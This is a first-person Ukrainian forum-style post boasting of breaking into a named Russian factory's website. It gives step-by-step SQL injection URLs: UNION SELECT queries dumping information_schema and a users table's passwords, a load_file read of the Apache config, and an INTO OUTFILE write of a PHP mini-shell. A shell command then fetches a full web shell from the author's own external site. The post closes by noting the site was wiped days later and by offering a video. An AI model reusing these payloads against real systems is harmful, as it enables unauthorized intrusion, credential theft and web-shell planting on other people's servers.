Початок.
—————————————————————————————————–
Усе почалося випадково, я з другом сидів удома, читав статейки в інеті, один в

жартома запропонував мені зламати сайт турбо-генераторного заводу(www.ngs-

privod.ru) в нашому місті, я від нєфіг робити зайшов на нього і в перший

ліпший передеаваемый скриптам параметр підставив лапки(www.ngs-

privod.ru/news.php?id=127′), сервер тут же видав помилку:-)

Сам злом.
——————————————————————————————————-
Далі я підібрав кількість полів www.ngs-privod.ru/news.php?id=127’+order+by+6/*), полів було всього 6, далі я подивився версію Mysql(5.0.45).

У цій версії є information_schema, і я склав такий лінк(www.ngs-

privod.ru/news.php?id=127’+union+select+1,table_chema,3,4,column_name,6+from

+infomation_schema.columns/*).

Сервер видав мені довгий список таблиць і полів в них, я помітив табличку

copper_users і витягнув звідти user_name і user_password.

Адмін я не знайшов, а віддалене підключення до бд було відключено.

Було вирішено залити спершу минишелл а потім з його допомогою повноцінний шелл.

Спершу я прочитав конфіги сервера(www.ngs-privod.ru/news.php?id=127’+union

+select+1,load_file(‘/usr/local/apache/conf/httpd.conf’),3,4,5+from+copper_users/*)

Досконально вивчивши його я знайшов ще один сайт на сервері(privod-centr.ru)

в надії знайти адмінку я зайшов туди і обламався, там була копія

попереднього сайту(www.ngs-privod.ru), в конфігах сервера я подивився

DocumentRoot(/usr/local/privod/htdocs) і зробив такий лінк(www.ngs-privod.ru/

news.php?id=127’+union+select+1,”,3,4,5,6+from

+copper_users+into+outfile+’/usr/local/privod/htdocs/cmd.php’/*), як не дивно але

вийшло:-)(-код минишелла на php).

Я зайшов за адресою www.ngs-privod.ru/cmd.php?cmd=ls -la(ls-la команда

минишелу), сервер дав мені список файлів в директорії /usr/local/privod/htdocs,

зрозуміло, що права на запис у мене були, я залив на свій

народовский сайт повноцінний шелл(remview.php).

Посилання www.ngs-privod.ru/cmd.php?cmd=fetch bahoiks.narod.ru/

remview.php;cp remview.php shell.php;rm -rf remview.php;ls -la) я скопіював шелл

на піддослідний сервер, зайшовши за посиланням www.ngs-privod.ru/shell.php я побачив

шелл, на сервері виявилася FreeBSD.

Через 4!!! дня сайт закрили, а точніше видалили весь вміст з теки htdocs

З. И
——————————————————————————————————–
Не судіть строго, статтю пишу в перший раз, так само записав відео, кому треба

стукайте в асю 6999588